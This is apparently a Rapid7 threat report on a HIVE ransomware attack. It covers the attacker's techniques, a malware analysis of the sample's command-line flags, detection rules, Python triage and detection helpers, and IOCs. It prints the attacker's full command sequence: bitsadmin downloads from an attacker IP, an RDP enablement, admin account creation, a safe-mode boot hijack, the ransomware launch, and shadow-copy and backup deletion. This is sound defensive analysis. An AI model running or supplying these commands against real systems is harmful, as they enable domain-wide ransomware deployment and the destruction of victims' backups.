### How malicious actors evade detection and disable defenses for more destructive HIVE Ransomware attacks.

Rapid7 routinely conducts research into the wide range of techniques that threat actors use to conduct malicious activity. One objective of this research is to discover new techniques being used in the wild, so we can develop new detection and response capabilities.
Recently, Rapid7 observed a malicious actor performing several known techniques for distributing ransomware across many systems within a victim's environment. In addition to those techniques, the actor employed a number of previously unseen techniques designed to drop the victim's defenses, inhibit monitoring, disable networking and buy time for the ransomware to finish encrypting files. These extra steps would make it extremely difficult, if not impossible, for a victim to effectively use their security tools to defend endpoints after a certain point in the attack.
Rapid7 has updated existing detections and added new ones to InsightIDR to defend against these techniques. In this article, we'll explore the techniques employed by the threat actor, why they're so effective, and how we've updated InsightIDR to protect against them.
### What approach did the malicious actor take to prepare the victim’s environment?
Initially using [Cobalt Strike](), the malicious actor retrieved system administration tools and malicious payloads by using the Background Intelligent Transfer Service ([BITSAdmin]()).
```
"C:\Windows\system32\bitsadmin.exe" /transfer debjob /download /priority normal https://79.137.206.47/PsExec.exe C:\Users\Public\PsExec.exe
bitsadmin /transfer debjob /download /priority normal https://79.137.206.47/int.exe C:\Windows\int.exe
```
The malicious actor then began using the remote process execution tool [PSExec]() to execute a batch file (`rdp.bat`) that used `reg.exe` to make the registry change needed to [enable Remote Desktop]() (RDP) sessions. This enabled the malicious actor to move laterally throughout the victim's environment using the graphical user interface.
```
PSEXESVC.exe: C:\Windows\PSEXESVC.exe
  -> cmd.exe: C:\Windows\system32\cmd.exe /c ""rdp.bat" "
     -> reg.exe: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
```
Rapid7 observed the malicious actor add/change policies for the Active Directory domain to perform the following:
1. Copy down batch scripts
2. Execute batch scripts (`file1.bat`), which:
   1. Creates an administrator account on the local system
   2. Reconfigures [boot configuration data]() (`bcdedit.exe`) so that the host will not load any additional drivers or services (i.e. network drivers or endpoint protection)
   3. Sets various registry values to ensure the created local administrator user will automatically log on by default
   4. Changes the [Windows Shell]() from Explorer to their malicious script (`file2.bat`)
   5. Reboots the system with the shutdown command
3. On reboot, the system logs in and executes the shell (`file2.bat`), which:
   1. Extracts the HIVE ransomware payload(s) from an encrypted archive (`int.7z`) using 7-Zip's console executable (`7zr.exe`)
   2. Executes the ransomware payload (`int.exe` or `int64.exe`)
Below are some commands observed being executed by the malicious actor (with necessary redactions):
```
xcopy.exe /C/Q/H/Y/Z "\\sysvol\Policies\{}\Machine\Scripts\Startup\file1.bat" "C:\windows"
xcopy.exe /C/Q/H/Y/Z "\\sysvol\Policies\{}\Machine\Scripts\Startup\file2.bat" "C:\windows"
xcopy.exe /C/Q/H/Y/Z "\\sysvol\Policies\{}\Machine\Scripts\Startup\7zr.exe" "C:\windows"
xcopy.exe /C/Q/H/Y/Z "\\sysvol\Policies\{}\Machine\Scripts\Startup\int.7z" "C:\windows"
C:\WINDOWS\SYSTEM32\cmd.exe /c "C:\windows\file1.bat"
net user /add
C:\WINDOWS\system32\net1 user /add
net user /active:yes
C:\WINDOWS\system32\net1 user /active:yes
net localgroup Administrators /add
C:\WINDOWS\system32\net1 localgroup Administrators /add
bcdedit /set {default} safeboot minimal
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeText /t REG_SZ /d "" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeCaption /t REG_SZ /d "" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LegalNoticeText /t REG_SZ /d "" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LegalNoticeCaption /t REG_SZ /d "" /f
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d 1 /f
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d /f
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d /f
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoLogonCount /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "C:\windows\file2.bat" /f
shutdown -r -f -t 10 -c "Computer Will Now Restart In SAFE MODE..."
```
Rapid7 also observed the malicious actor extracting the HIVE ransomware payload from an encrypted 7-Zip archive (`int.7z`) using 7-Zip's console application (`7zr.exe`) and a simple password (`123`):
`"C:\windows\7zr.exe" x c:\windows\int.7z -p123 -oc:\windows`
The malicious actor then manually executed the ransomware (`int.exe`) once, passing only the required username:password combination to the `-u` flag. This presumably encrypted the local drive and also all network shares the user had access to:
`"C:\Windows\int.exe" -u :`
The malicious actor also manually executed the 64-bit version of the ransomware (`int64.exe`) once on a different host with the `-no-discovery` flag. This is likely intended to override the default behavior so that network shares are not discovered and encrypted. The `-u` flag was also passed, with the same username:password values seen on the other host.
`C:\Windows\int64.exe -u : -no-discovery`
### Why is this approach so effective?
Deployment of ransomware using Active Directory group policies allows the malicious actor to hit all systems in the environment for as long as that group policy is active in the victim's environment. In this case, any system that booted while connected to the environment would receive the configuration changes, the encrypted archive containing the ransomware, a decompression utility to extract it, and the order to reboot and execute. This can be especially effective if timed with deployments of patches that require a reboot, done at the beginning of the day, or even forced remotely using [PowerShell's Stop-Computer cmdlet]().
Storing the ransomware within an encrypted 7-Zip archive (`int.7z`) with a password, even one as simple as `123`, makes identifying the ransomware on disk or in transit across the network nearly impossible. This makes retrieval and staging of the malicious actor's payload very difficult for security software or devices (antivirus, web filtering, IDS/IPS and more) to spot. In this case, the malicious actor took care to put only the encrypted copy on the disk of a victim's system and not to execute it until the defenses on the endpoint had been fully dropped.
Reconfiguring the default boot behavior to safeboot minimal and then rebooting unloads all but the bare minimum of the Windows operating system. With no additional services, software or drivers loaded, the system is at its most vulnerable. With no active defenses (antivirus or endpoint protection), the system comes up and tries to start its defined shell, which the malicious actor has swapped for a batch script (`file2.bat`).
It should be noted that in this state, **there is no method of remotely interacting with the system, as no network drivers are loaded. In order to respond and halt the ransomware, each host must be physically visited for shutdown.** Manually priming the host in this way is more effective than the built-in capabilities of the HIVE ransomware, which stops specific defensive services (Windows Defender, etc.) and kills specific processes prior to encrypting the contents of the drive.
All systems in this state are left automatically logged in as an administrator, which gives anyone with physical access complete control. Lastly, the system will continue to boot into safeboot minimal mode by default (again, with no networking) until each system is set back to its original state with a command such as the one below. Bringing the host back online in this state, with the shell still pointing at the script, will still execute the malware at logon, which will also enable the default network spreading behavior.
`bcdedit /deletevalue {default} safeboot`
Lastly, the malicious actor also manually executed the payload a few times on systems that had not been put into `safeboot minimal` and rebooted. Systems on which it was executed with only the `-u` flag actively searched out network shares they had access to and encrypted their contents. This ensures that only the intended hosts perform network share encryption, and that the hosts rebooted into safeboot minimal do not flood the network by simultaneously encrypting all files. It also means that the contents of network file shares that are not Windows based (various NAS devices, Linux hosts using Samba) will be encrypted even if the payload is never deployed on that specific host. This approach would be extremely destructive to both corporate environments and home users with network attached storage systems for backups. Rapid7 notes that [ThreatLocker]() has reported on similar activity in their knowledge base article entitled [Preventing BCDEdit From Being Weaponized]().
### Malware analysis of HIVE sample
Rapid7 observed that the HIVE payload would not execute unless the `-u` flag was passed. During analysis it was discovered that passing `-u asdf:asdf` results in that colon-delimited value being used as the login and password provided to the victim for authenticating to the site behind the onion link on the Tor network:

This and other behaviors were previously reported on by Microsoft's article [Hive Ransomware Gets Upgrades in Rust]() and also by Sophos in their [Github Repository of IoC's]() mentioned in their article [Lockbit, Hive, and BlackCat attack automotive supplier in triple ransomware attack](). Some flags are noted in those reports to exist, but their behavior is not documented. Rapid7 has analyzed and documented the behaviors of these flags, and discovered two new flags (`-timer`, `-low-key`) in the HIVE ransomware samples.
The new flags `-t`, `-timer`, `--timer` cause the malware to wait the specified number of seconds before going on to perform its actions. The other new flags `-low-key`, `--low-key` cause the ransomware to focus only on encrypting data and skip the pre-encryption tasks, including deleting shadow copies (malicious use of `vssadmin.exe`, `wmic.exe`), deleting backup catalogs (malicious use of `wbadmin.exe`), and disabling Windows Recovery Mode (malicious use of `bcdedit.exe`). These features give the malicious actor more control over how and when the payload executes and sidestep the command line and parent/child process detections commonly used against most ransomware families.
Fundamentally, the sample's flags distill down into encryption operations of `local`, `mount` and `discovery`. The local module calls the [LookupPrivilegeValueW]() and [AdjustTokenPrivileges]() Windows APIs on its own process (obtained via [GetCurrentProcess]() and [OpenProcessToken]()) to acquire SeDebugPrivilege. This is presumably required for the subsequent [OpenProcess]() -> [OpenProcessToken]() -> [ImpersonateLoggedOnUser]() call chain against the `winlogon.exe` and `trustedinstaller.exe` processes, which the sample uses to stop security services and essential processes when `--low-key` is not passed. [ShellExecuteA]() is also used to launch various Windows binaries (`bcdedit.exe`, `notepad.exe`, `vssadmin.exe`, `wbadmin.exe`, `wmic.exe`) to destroy backups and display the ransom note. The mount module uses [NetUseEnum]() to identify the current list of locally-mounted network shares and adds them to the list to be encrypted. Lastly, the discovery module uses [NetServerEnum]() to identify available Windows hosts within the domain/workgroup; this list is then fed to [NetShareEnum]() to identify file shares on each remote host and add them to the list of locations whose files will be encrypted.
By default, all three modes (`local`, `mount` and `discovery`) are enabled, so all local, mounted and enumerable shares will have their contents encrypted. This effectively ransoms all systems in a victim's environment with a single execution of HIVE when performed by a privileged user such as a Domain or Enterprise Admin account. Command line flags may be used to change this behavior and invoke one or more of the modules. For instance, `--local-only` will use only the local module, while `--network-only` will use the mount and discovery modules.
| Flag | Description |
|---|---|
| `-u` | `<username>:<password>` for login to the hivecust*.onion domain to identify the victim |
| `-da` | `<domainname>\<username>:<password>`: use different credentials when doing network spreading. Likely shorthand for "Domain Admin". Calls [LogonUserW](), triggering a [4624(S): Type 3 Network Logon]() event, then calls [ImpersonateLoggedOnUser]() using the token returned by LogonUserW. |
| `-low-key`, `--low-key` | Encrypt files and open the ransom note (if the local filesystem is to be encrypted), but do not spawn other binaries (vssadmin.exe, WMIC.exe, wbadmin.exe, bcdedit.exe) to perform other destructive actions for impact. Also skips enumeration and stopping of antivirus software. |
| `-no-local`, `--no-local` | Do not encrypt local files |
| `-no-mounted`, `--no-mounted` | Do not encrypt mounted filesystems |
| `-no-discovery`, `--no-discovery` | Do not enumerate or encrypt file shares on the network |
| `-local-only`, `--local-only` | Only encrypt local file systems |
| `-network-only`, `--network-only` | Only encrypt file shares on the network |
| `-explicit-only`, `--explicit-only` | Only encrypt files in the specified path |
| `-min-size`, `--min-size` | Only encrypt files greater than or equal to a specific number of bytes |
| `-t`, `-timer`, `--timer` | Do not encrypt files until after the specified number of seconds |
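An added triage helper (not code from the HIVE sample or from Rapid7) that turns an observed HIVE command line into the behaviour the flag table above predicts: which modules run, whether the pre-encryption child processes will appear, and any delay. It assumes `-t`/`-timer`, `-min-size` and `-explicit-only` each take one following argument and that `-no-*` exclusions apply after a `*-only` selection; the sample command lines in the usage are the ones quoted in this article plus one constructed case.

```python
import shlex

MODULES = {"local", "mount", "discovery"}          # the three encryption modules
EXCLUDE = {"no-local": "local", "no-mounted": "mount", "no-discovery": "discovery"}
# Child processes the article lists for the pre-encryption tasks that -low-key skips.
PRE_ENCRYPTION_CHILDREN = ["vssadmin.exe", "wmic.exe", "wbadmin.exe", "bcdedit.exe"]


def hive_plan(cmdline):
    """Interpret an observed HIVE command line and return the behaviour to expect."""
    args = shlex.split(cmdline, posix=False)[1:]   # drop the image; keep Windows paths intact
    plan = {"modules": set(MODULES), "low_key": False, "delay_s": 0, "min_size": 0,
            "explicit_path": None, "victim_creds": False, "spread_creds": False}
    excluded, i = set(), 0
    while i < len(args):
        flag = args[i].lstrip("-").lower()          # -flag and --flag are equivalent
        value = args[i + 1] if i + 1 < len(args) else None
        if flag == "u":                              # <user>:<pass> for the .onion site
            plan["victim_creds"], i = True, i + 1
        elif flag == "da":                           # alternate creds for network spreading
            plan["spread_creds"], i = True, i + 1
        elif flag == "low-key":
            plan["low_key"] = True
        elif flag == "local-only":
            plan["modules"] = {"local"}
        elif flag == "network-only":
            plan["modules"] = {"mount", "discovery"}
        elif flag == "explicit-only":                # assumption: the path follows the flag
            plan["modules"], plan["explicit_path"], i = set(), value.strip('"'), i + 1
        elif flag in EXCLUDE:
            excluded.add(EXCLUDE[flag])
        elif flag in ("t", "timer"):                 # assumption: seconds follow the flag
            plan["delay_s"], i = int(value), i + 1
        elif flag == "min-size":                     # assumption: byte count follows the flag
            plan["min_size"], i = int(value), i + 1
        i += 1
    plan["modules"] -= excluded                      # assumption: exclusions apply after *-only
    # Without -low-key the sample spawns the backup-destruction binaries; the ransom note
    # (notepad.exe) is only displayed when the local filesystem is encrypted.
    plan["expected_children"] = [] if plan["low_key"] else list(PRE_ENCRYPTION_CHILDREN)
    if "local" in plan["modules"]:
        plan["expected_children"].append("notepad.exe")
    return plan


if __name__ == "__main__":
    # The two command lines quoted in this article, plus a constructed low-key variant.
    for observed in (r'"C:\Windows\int.exe" -u :',
                     r'C:\Windows\int64.exe -u : -no-discovery',
                     r'int.exe -u a:b --low-key --network-only -t 30'):
        print(observed, "->", hive_plan(observed))
```

A command line carrying `-low-key` will produce none of the `vssadmin`/`wmic`/`wbadmin`/`bcdedit` child processes, so detections keyed on those children must be backed by the earlier-stage rules.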
By default, the ransomware will execute the following child processes with the following arguments:
Use of `vssadmin.exe` to delete shadow copies, which removes unencrypted backups of the files being ransomed:
`"C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet`
Use of `wmic.exe` to issue WMI calls that likewise delete all shadow copies, again removing unencrypted backups of the files being ransomed:
`"C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete`
Use of `wbadmin.exe` to delete backup catalogs:
`"C:\Windows\System32\wbadmin.exe" delete systemstatebackup`
`"C:\Windows\System32\wbadmin.exe" delete catalog -quiet`
`"C:\Windows\System32\wbadmin.exe" delete systemstatebackup -keepVersions:3`
Use of `bcdedit.exe` to disable automatic repair and ignore errors when booting:
`"C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled No`
`"C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures`
Lastly, `notepad.exe` is opened to display the ransom note with instructions to the victim on how to pay:
`"C:\Windows\System32\notepad.exe" C:\HOW_TO_DECRYPT.txt`
### Rapid7 Protection
Rapid7 has detections in place within InsightIDR, through the Insight Agent, to detect this type of ransomware activity. However, since the malicious actor reboots the host into the `safeboot minimal` state, neither endpoint protection software nor networking will be running while the endpoint is executing the ransomware.
So, identifying the actions of a malicious actor **before** ransomware is deployed is crucial to preventing the attack. In other words, it is essential to identify malicious actors within the environment and eject them before the ransomware payload is dropped.
The following detections are now available in InsightIDR to identify this attacker behavior.
* Attacker Technique – Auto Logon Count Set Once
* Attacker Technique – Potential Process Hollowing To DLLHost
* Attacker Technique – Shutdown With Message Used By Malicious Actors
* Attacker Technique – URL Passed To BitsAdmin
* Lateral Movement – Enable RDP via reg.exe
* Suspicious Process – BCDEdit Enabling Safeboot
* Suspicious Process – Boot Configuration Data Editor Activity
* Suspicious Process – DLLHost With No Arguments Spawns Process
* Suspicious Process – Rundll32.exe With No Arguments Spawns Process
* Suspicious Process – ShadowCopy Delete Passed To WMIC
* Suspicious Process – Volume Shadow Service Delete Shadow Copies
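As an added illustration (not InsightIDR's or Rapid7's rule logic), the following Python expresses several of the detections named above as command-line patterns over process-creation events and then correlates them per host, so that the safe-boot priming chain (safeboot set, AutoLogonCount set, shutdown with message) is surfaced before the reboot takes the host off the network. The rule names mirror the list; the regexes, the event format and the sample events are assumptions constructed for this example from the command lines quoted in the article.

```python
import re

# (rule name, regex matched case-insensitively over the full command line). Names follow the
# InsightIDR list above; the patterns are this example's own approximation of each rule.
RULES = [
    ("Attacker Technique - URL Passed To BitsAdmin",
     r"\bbitsadmin(\.exe)?\b.*/transfer\b.*https?://"),
    ("Lateral Movement - Enable RDP via reg.exe",
     r"\breg(\.exe)?\b.*\badd\b.*terminal server.*fdenytsconnections.*/d\s+0\b"),
    ("Suspicious Process - BCDEdit Enabling Safeboot",
     r"\bbcdedit(\.exe)?\b.*/set\b.*\bsafeboot\b"),
    ("Suspicious Process - Boot Configuration Data Editor Activity",
     r"\bbcdedit(\.exe)?\b.*/set\b"),                 # any bcdedit /set; narrower than the product rule
    ("Attacker Technique - Auto Logon Count Set Once",
     r"\breg(\.exe)?\b.*\badd\b.*winlogon.*autologoncount.*/d\s+1\b"),
    ("Attacker Technique - Shutdown With Message Used By Malicious Actors",
     r"\bshutdown(\.exe)?\b(?=.*\s[-/]r\b)(?=.*\s[-/]c\b)"),   # reboot switch plus a message
    ("Suspicious Process - ShadowCopy Delete Passed To WMIC",
     r"\bwmic(\.exe)?\b.*\bshadowcopy\s+delete\b"),
    ("Suspicious Process - Volume Shadow Service Delete Shadow Copies",
     r"\bvssadmin(\.exe)?\b.*\bdelete\s+shadows\b"),
]

SAMPLE_EVENTS = [  # constructed process-creation events modelled on this article's command lines
    {"host": "ws01", "cmdline": r'"C:\Windows\system32\bitsadmin.exe" /transfer debjob /download /priority normal https://79.137.206.47/PsExec.exe C:\Users\Public\PsExec.exe'},
    {"host": "ws01", "cmdline": r'reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f'},
    {"host": "ws02", "cmdline": r'bcdedit /set {default} safeboot minimal'},
    {"host": "ws02", "cmdline": r'reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoLogonCount /t REG_DWORD /d 1 /f'},
    {"host": "ws02", "cmdline": r'shutdown -r -f -t 10 -c "Computer Will Now Restart In SAFE MODE..."'},
    {"host": "ws03", "cmdline": r'"C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete'},
    {"host": "ws03", "cmdline": r'reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell'},  # benign
    {"host": "ws02", "cmdline": r'bcdedit /deletevalue {default} safeboot'},   # responder's remediation
]


def evaluate(cmdline):
    """Names of every rule whose pattern matches this command line."""
    return [name for name, pattern in RULES if re.search(pattern, cmdline, re.I)]


def triage(events):
    """Run the rules over process-creation events; return (host, rule, cmdline) hits."""
    return [(ev["host"], rule, ev["cmdline"]) for ev in events for rule in evaluate(ev["cmdline"])]


# The three steps that prime a host for an unattended safe-mode encryption run.
PRIMING_CHAIN = {"Suspicious Process - BCDEdit Enabling Safeboot",
                 "Attacker Technique - Auto Logon Count Set Once",
                 "Attacker Technique - Shutdown With Message Used By Malicious Actors"}


def hosts_primed_for_safeboot(hits):
    """Hosts where the whole chain fired: they will come back with no network and no EDR,
    so they must be isolated before the reboot completes or visited physically after it."""
    rules_by_host = {}
    for host, rule, _ in hits:
        rules_by_host.setdefault(host, set()).add(rule)
    return sorted(h for h, rules in rules_by_host.items() if PRIMING_CHAIN <= rules)
```

Running `hosts_primed_for_safeboot(triage(SAMPLE_EVENTS))` returns only `ws02`; the remediation command `bcdedit /deletevalue {default} safeboot` does not match the safeboot rule.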
**IOCs**
| Type | Value |
|---|---|
| Registry Key | `HKLM\System\CurrentControlSet\Control\Terminal Server` |
| Registry Value | Type: DWORD, Name: fDenyTSConnections, Value: 0 |
| Filename | rdp.bat |
| Filename | file1.bat |
| Filename | file2.bat |
| Filename | int.7z |
| Filename | int64.exe |
| MD5 | 89ea20880a6aae021940a8166ff85ee8 |
| SHA1 | 4af769fb3109c754bc879201c61242217a674a2e |
| SHA256 | 067af912ceddb1ea181490f2b3b5a323efcac61c82207833cda70c21c84460cb |
| Filename | int.exe |
| MD5 | 8fba0d57696ccf672ddcea4ba4d0e885 |
| SHA1 | 31097a7f91d182755fc63ebf023bff54cda5ae9c |
| SHA256 | 184a0f96cef09408b192767b405b0266403c9ec429945c1a78703f04f18c7416 |
| IP Address | 79.137.206[.]47 |
| FQDN | paloaltocloud[.]online |
| FQDN | maxkey[.]online |
| FQDN | keycloud[.]live |
| FQDN | microcloud[.]online |
| FQDN | microcloud[.]live |
| IP Address | 194.135.24[.]241 |
| IP Address | 179.43.142[.]230 |
| IP Address | 77.73.133[.]80 |
| IP Address | 77.73.134[.]27 |
| IP Address | 77.73.134[.]10 |
**MITRE ATT&CK**
**Techniques**
[T1021 – Remote Services]()
[T1021.001 – Remote Desktop Protocol]()
[T1021.002 – SMB/Windows Admin Shares]()
[T1027 – Obfuscated Files Or Information]()
[T1027.009 – Embedded Payloads]()
[T1037 – Boot Or Logon Initialization Scripts]()
[T1037.003 – Network Logon Script]()
[T1059 – Command And Scripting Interpreter]()
[T1059.001 – PowerShell]()
[T1059.003 – Windows Command Shell]()
[T1070 – Indicator Removal]()
[T1080 – Taint Shared Content]()
[T1105 – Ingress Tool Transfer]()
[T1112 – Modify Registry]()
[T1135 – Network Share Discovery]()
[T1136 – Create Account]()
[T1136.001 – Local Account]()
[T1140 – Deobfuscate/Decode Files Or Information]()
[T1197 – BITS Jobs]()
[T1480 – Execution Guardrails]()
[T1484 – Domain Policy Modification]()
[T1484.001 – Group Policy Modification]()
[T1485 – Data Destruction]()
[T1486 – Data Encrypted For Impact]()
[T1489 – Service Stop]()
[T1490 – Inhibit System Recovery]()
[T1529 – System Shutdown/Reboot]()
[T1547 – Boot Or Logon Autostart Execution]()
[T1560 – Archive Collected Data]()
[T1560.001 – Archive Via Utility]()
[T1562 – Impair Defenses]()
[T1562.001 – Disable Or Modify Tools]()
[T1562.009 – Safe Mode Boot]()
[T1570 – Lateral Tool Transfer]()
**Software**
[S0029 – PSExec]()
[S0075 – Reg]()
[S0190 – BITSAdmin]()
[S0154 – Cobalt Strike]()

